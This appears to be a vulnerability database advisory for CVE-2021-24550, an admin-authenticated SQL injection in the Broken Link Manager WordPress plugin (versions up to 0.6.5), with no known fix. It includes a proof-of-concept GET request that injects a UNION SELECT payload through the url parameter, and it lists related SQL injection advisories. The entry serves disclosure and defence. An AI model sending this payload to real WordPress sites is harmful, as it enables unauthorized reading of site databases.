Broken Link Manager <= 0.6.5 – Authenticated (admin+) SQL Injection | CVE 2021-24550 | Plugin Vulnerabilities

Description

The plugin does not sanitise, validate or escape the url GET parameter before using it in a SQL statement when retrieving an URL to edit, leading to an authenticated SQL injection issue

Proof of Concept

GET /wp-admin/admin.php?page=wblm-edit-url&url=-4966%20UNION%20ALL%20SELECT%20NULL,current_user(),current_user(),NULL,NULL,NULL,NULL-- HTTP/1.1
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US,en;q=0.9
Cookie: [admin+]
Connection: close

Affects Plugins

broken-link-manager

No known fix

References

CVE

URL

https://codevigilant.com/disclosure/2021/wp-plugin-broken-link-manager/

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Shreya Pohekar of Codevigilant Project

Verified

Yes

WPVDB ID

1bf65448-689c-474d-a566-c9b6797d3e4a

Timeline

Publicly Published

2021-07-24 (about 4 years ago)

Added

2021-07-24 (about 4 years ago)

Last Updated

2022-02-24 (about 3 years ago)

Other

Published

Title

Published

2025-01-15

Title

Passwords Manager < 1.5.1 - Authenticated (Subscriber+) SQL Injection

Published

2025-01-13

Title

Course Booking System < 6.0.7 - Unauthenticated SQL Injection

Published

2024-08-26

Title

Woocommerce Addon by Greenshift< 1.9.8 - Authenticated (Subscriber+) SQL Injection

Published

2025-02-03

Title

uListing < 2.1.7 - Unauthenticated SQL Injection

Published

2020-04-28

Title

WP-Advanced-Search < 3.3.7 - Authenticated SQL Injection